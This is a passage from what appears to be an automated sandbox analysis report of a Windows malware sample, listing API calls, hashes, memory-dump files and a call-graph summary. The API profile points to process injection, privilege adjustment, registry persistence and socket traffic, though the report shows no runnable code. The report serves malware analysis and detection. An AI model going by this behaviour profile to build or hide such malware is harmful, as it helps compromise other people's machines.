                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE115E36A00504EFCB24EF9CC891AADB7F6FFC8715B258559E84A93711DB30ED119B50

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 281 9760ec-976110 call 97157d RegSetValueExW
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,00976086,?,00976086,00000000,?,?,00000000), ref: 0097610D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6f6473560ad2c1c083fec917bef3436dd30e58b00a3ac352e10f65526addaaf8
                                                                                                                                                                                                                                                                                            • Instruction ID: f9b181613b1882aa35d0eba3b340064eadb73bead10431778b69b6821c8e581c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f6473560ad2c1c083fec917bef3436dd30e58b00a3ac352e10f65526addaaf8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AD0C9321842097FEF155ED4ED03F993B16EB84760F108005FB28180E19AB3A9609A55
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,0000005B,00003000,00000004,00000000,?,00971E7D,?,02020202,?,00971DA8,70677177), ref: 00975372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c716634607aa5d6ebeb11f76fb8d518c1ba7ef5770581fb8aa11edb8290a5087
                                                                                                                                                                                                                                                                                            • Instruction ID: d02e91cd3ef1c7ac23c798c77114800c582c1ebc3768aa387a32f7e507253e05
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c716634607aa5d6ebeb11f76fb8d518c1ba7ef5770581fb8aa11edb8290a5087
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3E0C2273447047BE65962899C03F6B3A5ECBC1BA0F104028F31C891C1EDD3EA4082B6
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00971DBA,00000000), ref: 009753AD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 63aca5e69f362a2f66964f99f5798b692e83d8749495556c3b5e2a127cb4424e
• Instruction ID: 444f0f5fce74d387a73fcae90888a345a17e040a743ef049e7cd764f9d4b6c8e
• Opcode Fuzzy Hash: 63aca5e69f362a2f66964f99f5798b692e83d8749495556c3b5e2a127cb4424e
• Instruction Fuzzy Hash: 0DC01232144708BEF7142994DC0BF5436589780750F60C016B70C2C4F19DE269D08984
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 3ba3e3d50fd1033ab19ddf5a9e4d35dd46908737180192106eb6e237664af37a
• Instruction ID: 6573b0fcc1c3b71fa5f7dc7688b9bc8f80f0c3577b947c90651af02df60717ff
• Opcode Fuzzy Hash: 3ba3e3d50fd1033ab19ddf5a9e4d35dd46908737180192106eb6e237664af37a
• Instruction Fuzzy Hash: 66C04C322D93087FF91966D5AC03F593A498B81F64F604005F71C1C4D298D36690459A
APIs
• CloseHandle.KERNEL32(00975868,?,00975868,000000FF), ref: 00972385
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 963638d8fe267b8f1dfdafc6b40a87051c94e5109645c09a02a2759dc80fe65e
• Instruction ID: 46cf593364ad2b16e30b9f8ad805f18a663ccd0417a83d42729f09b6073ea0a0
• Opcode Fuzzy Hash: 963638d8fe267b8f1dfdafc6b40a87051c94e5109645c09a02a2759dc80fe65e
• Instruction Fuzzy Hash: BFB0923264C20C3FEA1826D5EC0BE583B49CBC0760F604016FA1D480A2ADE3AA9054D5

Execution Graph

Execution Coverage: 18.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.7%
Total number of Nodes: 1706
Total number of Limit Nodes: 9
                                                                                                                                                                                                                                                                                            execution_graph 5700 406e43 5701 406efb LoadLibraryW 5700->5701 5703 406e53 5701->5703 5702 406ea7 ExitThread 5703->5702 5704 404c49 2 API calls 5703->5704 5706 406e73 5704->5706 5705 406e9e 5705->5702 5706->5705 5708 409ba4 GetModuleHandleW 5706->5708 5709 409bc2 GetProcAddress 5708->5709 5738 409bf5 5708->5738 5710 409bd9 5709->5710 5709->5738 5711 404c49 2 API calls 5710->5711 5712 409be4 5711->5712 5740 408812 5712->5740 5714 409bf0 5715 4063b6 2 API calls 5714->5715 5714->5738 5716 409c10 5715->5716 5717 40887b 8 API calls 5716->5717 5716->5738 5718 409c3f 5717->5718 5719 404c49 2 API calls 5718->5719 5718->5738 5720 409c64 5719->5720 5721 4079b2 8 API calls 5720->5721 5722 409c6e 5721->5722 5723 404c49 2 API calls 5722->5723 5724 409c75 5723->5724 5725 407d09 25 API calls 5724->5725 5726 409c7f 5725->5726 5727 404c49 2 API calls 5726->5727 5728 409c91 5727->5728 5729 40632b 2 API calls 5728->5729 5728->5738 5730 409ccc 5729->5730 5731 404c49 2 API calls 5730->5731 5730->5738 5732 409cea 5731->5732 5733 404c49 2 API calls 5732->5733 5732->5738 5734 409d0f 5733->5734 5735 409d32 5734->5735 5736 409d43 5734->5736 5737 407388 12 API calls 5735->5737 5739 403ad5 24 API calls 5736->5739 5737->5738 5738->5705 5739->5738 5741 406efb LoadLibraryW 5740->5741 5742 40882e 5741->5742 5743 406efb LoadLibraryW 5742->5743 5746 408875 5742->5746 5744 408854 5743->5744 5745 401050 2 API calls 5744->5745 5745->5746 5746->5714 6312 4090c3 6313 404c49 2 API calls 6312->6313 6314 4090d4 6313->6314 6315 402e20 7 API calls 6314->6315 6316 4090f7 6315->6316 6320 409128 6316->6320 6324 409018 9 API calls 6316->6324 6318 409139 _endthreadex 6319 40910b 6319->6320 6321 408b72 43 API calls 6319->6321 
6320->6318 6322 409118 6321->6322 6323 406efb LoadLibraryW 6322->6323 6323->6320 6327 408f76 GetModuleHandleW GetProcAddress 6324->6327 6328 408fb1 GetModuleHandleW GetProcAddress 6327->6328 6329 408fad DeleteObject GdiplusShutdown 6327->6329 6328->6329 6330 408fc3 6328->6330 6329->6319 6332 408eda GdipGetImageEncodersSize 6330->6332 6333 408f01 6332->6333 6340 408efc 6332->6340 6334 404c49 2 API calls 6333->6334 6335 408f0a 6334->6335 6336 408f11 GdipGetImageEncoders 6335->6336 6335->6340 6337 408f26 6336->6337 6338 408f4a free 6336->6338 6337->6338 6339 408f29 wcscmp 6337->6339 6338->6340 6339->6337 6339->6340 6340->6329 6142 404104 6143 404b40 VirtualAlloc 6142->6143 6144 40411d 6143->6144 6145 404c49 2 API calls 6144->6145 6158 40412c 6145->6158 6146 4010ce 2 API calls 6146->6158 6147 406efb LoadLibraryW 6147->6158 6148 404511 6149 404520 _endthreadex 6148->6149 6152 403dd9 LoadLibraryW 6152->6158 6153 403f00 socket VirtualAlloc LoadLibraryW 6153->6158 6154 4040aa LoadLibraryW 6154->6158 6155 403d14 LoadLibraryW 6155->6158 6156 403d51 WSAGetLastError LoadLibraryW 6156->6158 6158->6146 6158->6147 6158->6148 6158->6152 6158->6153 6158->6154 6158->6155 6158->6156 6160 403ce0 6158->6160 6163 403e47 6158->6163 6168 403e1f 6158->6168 6171 4040c0 6158->6171 6161 406efb LoadLibraryW 6160->6161 6162 403cf8 6161->6162 6162->6158 6164 403e52 6163->6164 6165 403e57 6164->6165 6177 403d51 6164->6177 6165->6158 6169 403d51 2 API calls 6168->6169 6170 403e43 6169->6170 6170->6158 6175 4040ca 6171->6175 6172 404101 6172->6158 6174 403d51 2 API calls 6174->6175 6175->6172 6175->6174 6182 403f4e 6175->6182 6199 403dd9 6175->6199 6180 403d5c 6177->6180 6178 403da6 6178->6158 6179 406efb LoadLibraryW 6179->6180 6180->6178 6180->6179 6181 403d7d WSAGetLastError 6180->6181 6181->6178 6181->6180 6183 403f64 6182->6183 6185 404002 6182->6185 6184 406efb LoadLibraryW 6183->6184 6186 403f83 6184->6186 6187 406efb LoadLibraryW 6185->6187 6197 403fad 6185->6197 6189 403fb2 6186->6189 6190 
Execution Graph (rendered call graph; the node addresses and edge list do not survive as readable text). API and CRT calls labelled on the graph nodes, grouped by function:

Process and thread manipulation: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, Thread32First, Thread32Next, OpenThread, SuspendThread, ResumeThread, GetThreadContext, SetThreadContext, ReadProcessMemory, CreateProcessW, GetExitCodeProcess, WaitForInputIdle, CreateThread, _beginthreadex, _endthreadex, ExitThread, WaitForSingleObject, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, CloseHandle
Memory management: VirtualAlloc, VirtualProtect, VirtualFree, VirtualQuery, FlushInstructionCache, HeapCreate, HeapAlloc, HeapReAlloc, HeapFree, GetProcessHeap, IsBadReadPtr, realloc, free, memset, memcpy, memcmp
Module loading and resolution: LoadLibraryW, LoadLibraryA, FreeLibrary, GetModuleHandleW, GetModuleHandleA, GetProcAddress, GetPEB
Privileges and registry: LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExA, RegQueryValueExA, RegSetValueExA
Network: socket, setsockopt, connect, send, recv, closesocket, getpeername, inet_ntoa, DnsQuery_A
System information and timing: GetSystemInfo, GetNativeSystemInfo, GetTickCount, GetStartupInfoA, SetErrorMode, SetLastError, Sleep
Synchronization: InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedExchange, InterlockedCompareExchange
String and encoding: wsprintfW, wsprintfA, sprintf, sscanf, atoi, wcslen, strlen, wcsstr, strstr, wcstok, wcsrchr, wcscat, wcscpy, lstrcpyW, lstrcatW, StrStrIA, StrStrIW, StrCmpNA, StrCmpNIW, _wcsicmp, WideCharToMultiByte, CryptBinaryToStringW
CRT startup and exit: __p__commode, __setusermatherr, _controlfp, _initterm, __getmainargs, _XcptFilter, exit, _exit
5353->5354 5354->5324 5356 403671 memcpy memmove 5355->5356 5362 4036ad 5355->5362 5358 403861 5356->5358 5358->5333 5359 4036dd recv 5359->5358 5359->5362 5360 403872 5361 403097 send 5360->5361 5361->5358 5362->5358 5362->5359 5362->5360 5363 4037c8 memcpy 5362->5363 5364 403817 memmove 5362->5364 5365 4037f7 memcpy 5362->5365 5366 404c6a VirtualAlloc LoadLibraryW 5362->5366 5367 40342e 5 API calls 5362->5367 5363->5362 5364->5362 5365->5362 5366->5362 5367->5362 5369 4031c4 5368->5369 5370 4031bf 5368->5370 5371 406efb LoadLibraryW 5369->5371 5370->5345 5372 4031d8 5371->5372 5373 4082b1 4 API calls 5372->5373 5374 4031ea 5373->5374 5375 406efb LoadLibraryW 5374->5375 5376 4031fa 5375->5376 5376->5345 5378 4038f3 5377->5378 5380 403908 send 5378->5380 5381 4038fa 5378->5381 5382 40391c 5378->5382 5380->5381 5380->5382 5381->5348 5382->5381 5383 40342e 5382->5383 5389 403441 5383->5389 5384 404c6a 2 API calls 5384->5389 5385 406efb LoadLibraryW 5385->5389 5386 403569 send 5387 4035e7 5386->5387 5386->5389 5387->5381 5388 40360e 5388->5387 5390 403614 memmove 5388->5390 5389->5384 5389->5385 5389->5386 5389->5387 5389->5388 5391 4035bb memmove 5389->5391 5390->5387 5391->5389 5394 403028 5392->5394 5393 403078 5393->5166 5394->5393 5406 402ef0 5394->5406 5396 40305b 5396->5393 5397 402ef0 2 API calls 5396->5397 5397->5393 5399 4063d2 5398->5399 5400 406efb LoadLibraryW 5399->5400 5402 4063d9 5399->5402 5401 4063ec 5400->5401 5401->5402 5403 404c49 2 API calls 5401->5403 5402->5168 5404 406412 5403->5404 5404->5402 5405 406efb LoadLibraryW 5404->5405 5405->5402 5407 402f06 5406->5407 5409 402f5a 5406->5409 5407->5409 5410 401068 5407->5410 5409->5396 5411 406efb LoadLibraryW 5410->5411 5412 401078 VirtualFree 5411->5412 5412->5409 5414 406efb LoadLibraryW 5413->5414 5415 401060 RegCloseKey 5414->5415 5415->5177 5417 406efb LoadLibraryW 5416->5417 5418 4010b2 RegCreateKeyExA 5417->5418 5418->5180 6830 40acfd 6831 40ad0c InternetQueryOptionA 6830->6831 6833 40ad93 
6830->6833 6832 404c49 2 API calls 6831->6832 6834 40ad2a InternetQueryOptionA 6832->6834 6834->6833 6835 40ad3e 6834->6835 6836 404c17 2 API calls 6835->6836 6837 40ad46 6836->6837 6838 404b40 VirtualAlloc 6837->6838 6839 40ad5a 6838->6839 6840 404b40 VirtualAlloc 6839->6840 6841 40ad67 CreateThread WaitForSingleObject 6840->6841 6841->6833 5452 40547f 5467 40b030 5452->5467 5457 4054f8 clock 5484 4083d7 memset 5457->5484 5461 406efb LoadLibraryW 5462 405548 5461->5462 5463 401038 2 API calls 5462->5463 5464 40555b clock 5463->5464 5464->5457 5465 405566 5464->5465 5465->5457 5494 401020 5465->5494 5468 40548f memset memset 5467->5468 5469 407ffb 5468->5469 5497 4079b2 5469->5497 5471 40800a 5512 407d09 memset memset 5471->5512 5473 408017 5528 407795 5473->5528 5479 408032 5574 407e8f 5479->5574 5483 4054cd _beginthreadex _beginthreadex 5483->5457 5485 406efb LoadLibraryW 5484->5485 5486 408416 RegOpenKeyExW 5485->5486 5487 408433 5486->5487 5488 408444 5486->5488 5490 401050 2 API calls 5487->5490 5489 406efb LoadLibraryW 5488->5489 5492 408455 RegQueryValueExW 5489->5492 5491 405503 _beginthreadex 5490->5491 5491->5461 5492->5487 5493 408470 _wtoi 5492->5493 5493->5487 5495 406efb LoadLibraryW 5494->5495 5496 401030 5495->5496 5496->5465 5498 406efb LoadLibraryW 5497->5498 5499 4079c7 5498->5499 5594 404c17 5499->5594 5501 4079da 5597 40740f GetModuleHandleW GetProcAddress 5501->5597 5504 406efb LoadLibraryW 5505 407a01 RegOpenKeyExW 5504->5505 5506 407a1a 5505->5506 5510 407a65 5505->5510 5507 406efb LoadLibraryW 5506->5507 5508 407a31 RegQueryValueExW 5507->5508 5509 407a47 5508->5509 5511 401050 2 API calls 5509->5511 5510->5471 5511->5510 5603 4078d2 GetCurrentThread OpenThreadToken 5512->5603 5514 407d70 memset 5515 406efb LoadLibraryW 5514->5515 5516 407d97 5515->5516 5517 407e70 5516->5517 5518 407daf memset wsprintfW 5516->5518 5632 40652e 5517->5632 5520 4064d0 3 API calls 5518->5520 5522 407dfb strlen 5520->5522 5521 407e75 wcscpy 5523 407e5b 
5521->5523 5616 40632b 5522->5616 5523->5473 5529 406efb LoadLibraryW 5528->5529 5530 4077d2 5529->5530 5531 4077e4 5530->5531 5532 4078b7 wcscpy 5530->5532 5534 407890 5531->5534 5535 407870 wcscpy 5531->5535 5533 4078cb 5532->5533 5539 407b22 wcscpy CoInitializeEx 5533->5539 5536 40740f 4 API calls 5534->5536 5535->5534 5537 407898 wcscat 5536->5537 5537->5533 5540 407b50 CoInitializeSecurity 5539->5540 5541 407d04 5539->5541 5542 407b69 CoCreateInstance 5540->5542 5543 407cfe CoUninitialize 5540->5543 5560 407eb8 5541->5560 5542->5543 5544 407b8b 5542->5544 5543->5541 5545 406efb LoadLibraryW 5544->5545 5546 407ba5 SysAllocString 5545->5546 5548 407be2 SysFreeString 5546->5548 5549 407bf7 CoSetProxyBlanket 5548->5549 5559 407ce9 5548->5559 5550 407c12 SysAllocString SysAllocString 5549->5550 5549->5559 5551 407c3c SysFreeString SysFreeString 5550->5551 5552 407c50 5551->5552 5551->5559 5553 407ca9 5552->5553 5554 407c81 wcscpy VariantClear 5552->5554 5555 407cd2 5553->5555 5556 407cc2 wcscpy 5553->5556 5554->5552 5557 408a90 4 API calls 5555->5557 5556->5559 5558 407cd9 wcscpy 5557->5558 5558->5559 5559->5543 5561 407ed1 wcslen 5560->5561 5635 4065e5 5561->5635 5563 407eb8 50 API calls 5571 407ee8 5563->5571 5564 407f05 wcstok 5564->5571 5565 408d7e 43 API calls 5565->5571 5566 406efb LoadLibraryW 5566->5571 5567 407f90 wcstok 5567->5571 5568 403012 2 API calls 5568->5571 5569 4063b6 2 API calls 5569->5571 5571->5561 5571->5563 5571->5564 5571->5565 5571->5566 5571->5567 5571->5568 5571->5569 5572 407fc3 wcscpy 5571->5572 5645 402d51 5571->5645 5573 407fd8 5572->5573 5573->5479 5658 408b47 5574->5658 5576 407e96 5664 407734 5576->5664 5578 407e9b 5579 407a86 5578->5579 5689 40878c 5579->5689 5581 407b06 wcscpy 5584 407b1c 5581->5584 5582 407a8f 5582->5581 5583 404c49 2 API calls 5582->5583 5585 407aa2 5583->5585 5584->5483 5586 404c49 2 API calls 5585->5586 5587 407ab0 5586->5587 5588 406efb LoadLibraryW 5587->5588 5591 407ac1 5588->5591 5589 407af1 5590 408714 
5 API calls 5589->5590 5592 407afc 5590->5592 5591->5589 5593 407adf wsprintfW 5591->5593 5592->5581 5593->5589 5595 406efb LoadLibraryW 5594->5595 5596 404c27 VirtualAlloc 5595->5596 5596->5501 5598 407452 5597->5598 5599 407437 5597->5599 5598->5504 5600 406efb LoadLibraryW 5599->5600 5601 407444 IsWow64Process 5600->5601 5601->5598 5604 407900 GetLastError 5603->5604 5605 407928 GetTokenInformation 5603->5605 5606 407911 GetCurrentProcess OpenProcessToken 5604->5606 5615 40798a 5604->5615 5607 407940 GetLastError 5605->5607 5605->5615 5606->5605 5606->5615 5609 40794b 5607->5609 5607->5615 5608 407997 CloseHandle 5611 4079a0 5608->5611 5610 404c49 2 API calls 5609->5610 5612 407953 5610->5612 5611->5514 5613 40795a GetTokenInformation 5612->5613 5612->5615 5614 40796d LookupAccountSidW 5613->5614 5613->5615 5614->5615 5615->5608 5615->5611 5617 40633c 5616->5617 5618 406343 memset wsprintfW 5617->5618 5619 406efb LoadLibraryW 5617->5619 5624 408a90 5618->5624 5620 406357 5619->5620 5620->5618 5621 404c49 2 API calls 5620->5621 5622 406379 5621->5622 5622->5618 5623 406efb LoadLibraryW 5622->5623 5623->5618 5625 408a9e 5624->5625 5626 407e49 wcscpy 5625->5626 5627 408aa9 wcslen 5625->5627 5626->5523 5627->5626 5628 408abf 5627->5628 5629 404c49 2 API calls 5628->5629 5630 408ac9 5629->5630 5630->5626 5631 408b14 wsprintfW 5630->5631 5631->5630 5633 404c49 2 API calls 5632->5633 5634 406539 5633->5634 5634->5521 5634->5634 5636 4065fe 5635->5636 5637 406efb LoadLibraryW 5636->5637 5643 406605 5636->5643 5638 40661b 5637->5638 5639 404c49 2 API calls 5638->5639 5638->5643 5640 406645 5639->5640 5641 406efb LoadLibraryW 5640->5641 5640->5643 5642 406655 5641->5642 5642->5643 5651 406457 5642->5651 5643->5571 5649 402d63 5645->5649 5646 402dea 5646->5571 5647 402d7c toupper toupper 5648 402d93 toupper toupper 5647->5648 5647->5649 5648->5649 5649->5646 5649->5647 5650 402dc7 toupper toupper 5649->5650 5650->5649 5652 406efb LoadLibraryW 5651->5652 5654 40646c 
5652->5654 5653 4064a5 5653->5643 5654->5653 5655 404c49 2 API calls 5654->5655 5656 406499 5655->5656 5657 406efb LoadLibraryW 5656->5657 5657->5653 5659 408b4e 5658->5659 5660 40655c 4 API calls 5659->5660 5661 408b55 5660->5661 5672 408714 5661->5672 5663 408b62 5663->5576 5680 402e20 5664->5680 5666 40774a 5667 406efb LoadLibraryW 5666->5667 5668 407759 CreateFileW 5667->5668 5669 407776 5668->5669 5670 407789 5669->5670 5671 407780 CloseHandle 5669->5671 5670->5578 5671->5670 5673 406efb LoadLibraryW 5672->5673 5674 40872b RegCreateKeyExW 5673->5674 5675 408780 5674->5675 5676 40874a wcslen 5674->5676 5675->5663 5677 406efb LoadLibraryW 5676->5677 5678 408769 RegSetValueExW 5677->5678 5679 401050 2 API calls 5678->5679 5679->5675 5681 404c49 2 API calls 5680->5681 5682 402e2f SHGetFolderPathW 5681->5682 5683 402e45 5682->5683 5684 402e81 5682->5684 5685 402e78 PathAppendW 5683->5685 5686 402e58 PathAppendW 5683->5686 5684->5666 5685->5684 5686->5685 5687 402e63 CreateDirectoryW 5686->5687 5687->5685 5688 402e6f SetFileAttributesW 5687->5688 5688->5685 5690 406efb LoadLibraryW 5689->5690 5691 4087a8 RegOpenKeyExW 5690->5691 5692 4087c0 5691->5692 5693 4087d1 5691->5693 5695 401050 2 API calls 5692->5695 5694 404c49 2 API calls 5693->5694 5696 4087df 5694->5696 5697 4087ca 5695->5697 5698 406efb LoadLibraryW 5696->5698 5697->5582 5699 4087f3 RegQueryValueExW 5698->5699 5699->5692

Control-flow Graph

APIs
• wcscpy.MSVCRT ref: 00407B36
